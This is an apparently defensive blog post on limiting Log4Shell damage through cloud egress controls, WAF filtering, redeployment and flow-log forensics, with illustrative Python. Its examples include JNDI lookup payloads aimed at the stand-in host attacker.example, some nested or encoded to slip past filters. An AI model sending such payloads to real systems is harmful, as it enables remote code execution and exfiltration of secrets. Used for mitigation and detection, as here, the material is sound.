Using Cloud Deployments To Mitigate Log4Shell and Similar Vulnerabilities

It’s been a little over a week since disclosure of CVE-2021-44228, aka Log4Shell, a remote code execution vulnerability in Log4J 2.x. Hopefully by now everybody reading this has updated their Java deployments with the latest Log4J libraries. But no doubt there’s another vulnerability, in some popular framework or library, just waiting to make its presence known. This post is about Cloud features that can help you minimize the blast radius of such vulnerabilities.

The problem

For those who haven’t looked into CVE-2021-44228 (perhaps you don’t use Java, or don’t use Log4J 2.x), here are the conditions that made it happen:

Log4J 2.x provides a feature known as “lookups,” which allows you to retrieve data from outside the program: often environment variables, but there are many sources. Lookups are typically used to configure the logging framework for a particular application instance. What most developers didn’t know is that it’s also used by one of the components that formats log messages.
This means that logging unsanitized user-supplied data could have unintended consequences if that data included (intentionally or accidentally) the “escape sequence” that identifies a lookup. This would be annoying but not devastating, except …
One of the external sources is the Java Naming and Directory Interface (JNDI), which provides a common wrapper on a centralized directory service. For configuration, this makes a lot of sense: it allows companies to manage their application configuration in their existing LDAP servers. Invoked for arbitrary log messages, it provides a way to exfiltrate information about your application. And unknown to most Java developers, the JNDI specification also allows retrieval and instantiation of Java objects with code loaded from the remote server, creating a remote-code-execution vulnerability.

Combine these three, and you have a situation where a specially crafted log message could load and execute code from an attacker-controlled server. Public-facing web applications were the most vulnerable targets; web-apps in general are likely to log unsanitized user input (in access logs, if nowhere else).
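
To make the mechanism concrete, here is a toy model in Python. It is not Log4J's implementation, and the names (format_message, resolve, the DB_PASSWORD variable, the attacker.example host) are invented for illustration. It only shows why expanding lookups in an already-assembled message is dangerous: the user-supplied text gets interpreted rather than printed.

```python
import re

# Toy model only: Log4J's real lookup syntax and resolution are much richer.
LOOKUP = re.compile(r"\$\{(\w+):([^}]*)\}")


def resolve(kind, key, env):
    """Resolve a single lookup. Only two sources are modeled here."""
    if kind == "env":
        return env.get(key, "")
    if kind == "jndi":
        # A vulnerable logger would make a network request at this point.
        # The toy just reports what it would have contacted.
        return f"<would contact {key}>"
    return ""


def format_message(message, env):
    """Expand lookups in the final log message (the risky step)."""
    return LOOKUP.sub(lambda m: resolve(m.group(1), m.group(2), env), message)


env = {"DB_PASSWORD": "hunter2"}        # hypothetical application environment
user_agent = "${env:DB_PASSWORD}"       # attacker-supplied header value
print(format_message("request from agent " + user_agent, env))
# prints: request from agent hunter2
```

Replace the header value with ${jndi:ldap://attacker.example/a} and the toy reports an outbound connection instead, which is the step that the rest of this post tries to block.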

So how can a Cloud deployment mitigate this?

First, by controlling access to the Internet.

Log4Shell only “works” if it can connect to an attacker-controlled server. But Cloud providers give you many ways to control an application’s access to the Internet. I’m most familiar with AWS, which provides private subnets that don’t allow any Internet connectivity; security groups, which can limit outbound TCP or UDP connections to specific IP address ranges and ports; and network ACLs, which can provide similar access restrictions for everything in a subnet.

Unfortunately, these tools are not used nearly as much as they should be. Security groups, in particular, are primarily used to control inbound traffic, and allow unrestricted outbound traffic. One reason for this open access is that many applications do connect to external servers. Logging is a prime example: whether you use a third-party log aggregator or a service such as CloudWatch Logs, your application needs to connect to the Internet.

But it is possible to limit outbound access even with these requirements. AWS, for example, provides “VPC endpoints,” which allow you to connect to services using an in-VPC address. And most third-party providers will use static IP addresses that can be identified in your access rules.
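
As a rough sketch of what that looks like in practice, the Python below builds an outbound allow-list for a security group and swaps it in for the allow-all rule. It assumes you pass in a boto3 EC2 client; the CIDR blocks, ports, and descriptions are placeholders that I made up, not recommendations, and a real deployment would more likely express this in its infrastructure-as-code tool.

```python
# Hypothetical allow-list: (CIDR, TCP port, description).
ALLOWED = [
    ("10.0.0.0/16", 443, "VPC endpoints inside the VPC"),
    ("203.0.113.0/24", 443, "third-party log aggregator (placeholder range)"),
]

# The usual "anything, anywhere" outbound rule that we want to remove.
ALLOW_ALL = [{"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]


def egress_rules(allowed):
    """Translate the allow-list into the IpPermissions structure EC2 expects."""
    return [
        {
            "IpProtocol": "tcp",
            "FromPort": port,
            "ToPort": port,
            "IpRanges": [{"CidrIp": cidr, "Description": description}],
        }
        for cidr, port, description in allowed
    ]


def restrict_egress(ec2, group_id, allowed):
    """Add the specific rules first, then remove the allow-all rule.

    `ec2` is assumed to be a boto3 EC2 client, e.g. boto3.client("ec2").
    Adding before removing avoids a window with no outbound access at all.
    """
    ec2.authorize_security_group_egress(
        GroupId=group_id, IpPermissions=egress_rules(allowed)
    )
    ec2.revoke_security_group_egress(GroupId=group_id, IpPermissions=ALLOW_ALL)
```

With rules like these in place, a lookup that tries to reach an arbitrary LDAP server has nowhere to go, even if the application itself is still vulnerable.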

Second, by providing services that intercept requests before they hit your application.

As I said above, web applications are the most likely targets for this exploit, because they exist to accept requests from the Internet. But they can be protected: most Cloud vendors offer a web application firewall (WAF), which inspects incoming requests and rejects those that violate predefined rules. In addition to user-defined rules, vendors provide rulesets that can easily be added to a current WAF configuration.

I want to call out CloudFlare on this front: in addition to creating rules for their WAF, they also published an explanation of the vulnerability, a detailed description of how they responded to it (which is a great base for an end-user incident playbook!), and their observations of attempted attacks.

One of my biggest take-aways from those blog posts is the range of techniques that attackers used to hide their actions. While this particular vulnerability can be mitigated by rejecting any requests that contain the sequence ${, other vulnerabilities may be harder to detect. And it underscores that Cloud providers can throw more resources at identifying and mitigating attacks than the typical application development team.
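
For illustration only, here is roughly what a “reject anything containing ${” check could look like if you wrote it yourself in Python. The function names are mine, and this is not how any vendor's WAF is implemented; a managed ruleset handles far more encodings than the percent-decoding shown here. It can also reject legitimate requests that happen to contain the sequence.

```python
from urllib.parse import unquote


def fully_decoded(value, max_rounds=3):
    """Percent-decode repeatedly, since a payload may be encoded more than once."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def looks_like_lookup(value):
    """True if the value contains the ${ sequence once decoded."""
    return "${" in fully_decoded(value)


def should_reject(path, headers, body=""):
    """Check every part of the request that the caller controls."""
    candidates = [path, body, *headers.keys(), *headers.values()]
    return any(looks_like_lookup(c) for c in candidates)


# A nested lookup still contains the ${ sequence, so it is caught.
print(should_reject("/", {"User-Agent": "${${lower:j}ndi:ldap://attacker.example/a}"}))
# An encoded payload in the query string is caught after decoding.
print(should_reject("/search?q=%24%7Bjndi:ldap://attacker.example/a%7D", {}))
# An ordinary request passes.
print(should_reject("/index.html", {"User-Agent": "Mozilla/5.0"}))
```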

Third, by encouraging immutable deployments.

Let’s say that your application was vulnerable, but you were able to quickly rebuild with a fixed version of Log4J. Now you need to deploy that changed application. In a traditional data center, you’ll deploy onto existing servers. Servers that, if you’re unlucky, now harbor malware.

In the Cloud, however, a standard deployment practice is to start new servers and then shut down the old. While it’s possible for a targeted attack to create malware that survives this process, a mass exploitation like we saw last week is by its nature untargeted.

Fourth, by providing infrastructure logs that allow you to diagnose follow-on attacks.

One of the chief concerns with this vulnerability is not that your systems are running malware, but that the attackers were able to exfiltrate sensitive information.

Many applications use environment variables to provide information such as database passwords and connection strings. As shown in the CloudFlare posts, it’s easy to make a request to an external server in which the request URL embeds the values of commonly-used environment variables.

You may or may not have forensic logging enabled in your data center, but it’s easy and (relatively) cheap to do so with Cloud providers. AWS, for example, provides Flow Logs to track network communications (so you can see if your app-servers are talking to an unexpected remote host), and CloudTrail to track AWS API calls (so you can see who made changes to your infrastructure, when, and from where). Combine these with access logs generated at multiple levels of the web stack, and you can determine whether an attack was attempted, whether it was successful, and whether there were any post-attack repercussions.
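
As a sketch of the first of those checks, the Python below scans flow log records for accepted traffic from your app-servers to addresses outside an expected set. It assumes the default space-delimited Flow Logs record format; the subnet and allow-list CIDRs and the sample records are invented. It also doesn't try to tell who opened the connection, so replies to inbound clients would show up too unless those clients (a load balancer, say) are in the allow-list.

```python
import ipaddress

# Field order of the default flow log record format.
FIELDS = ("version account_id interface_id srcaddr dstaddr srcport dstport "
          "protocol packets bytes start end action log_status").split()


def parse_record(line):
    """Split one space-delimited flow log record into a dict."""
    return dict(zip(FIELDS, line.split()))


def unexpected_destinations(lines, local_cidr, allowed_cidrs):
    """Yield accepted flows from local_cidr to hosts outside allowed_cidrs."""
    local = ipaddress.ip_network(local_cidr)
    allowed = [ipaddress.ip_network(c) for c in allowed_cidrs]
    for line in lines:
        rec = parse_record(line)
        if rec.get("action") != "ACCEPT":
            continue  # rejected flows, header lines, and no-data records
        src = ipaddress.ip_address(rec["srcaddr"])
        dst = ipaddress.ip_address(rec["dstaddr"])
        if src in local and not any(dst in net for net in allowed):
            yield rec


# Invented sample records: one database connection, one suspicious LDAP call.
sample = [
    "2 123456789012 eni-0abc 10.0.1.15 10.0.2.20 49152 5432 6 10 840 1639500000 1639500060 ACCEPT OK",
    "2 123456789012 eni-0abc 10.0.1.15 198.51.100.7 49153 1389 6 12 900 1639500000 1639500060 ACCEPT OK",
]
for rec in unexpected_destinations(sample, "10.0.1.0/24", ["10.0.0.0/16"]):
    print(rec["srcaddr"], "->", rec["dstaddr"], "port", rec["dstport"])
```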

Moving forward

Perhaps you’ve updated and redeployed all of your applications. Perhaps you didn’t have anything that used Log4J 2.x. Or Java. Is it worth taking any of the steps that I’ve described in this post?

The simple answer is yes, because this won’t be the last vulnerability that allows unintended access to external servers. Software is complex; any non-trivial deployment has components whose interactions aren’t fully understood. But sooner or later, someone will find an interaction that has similar far-reaching effects.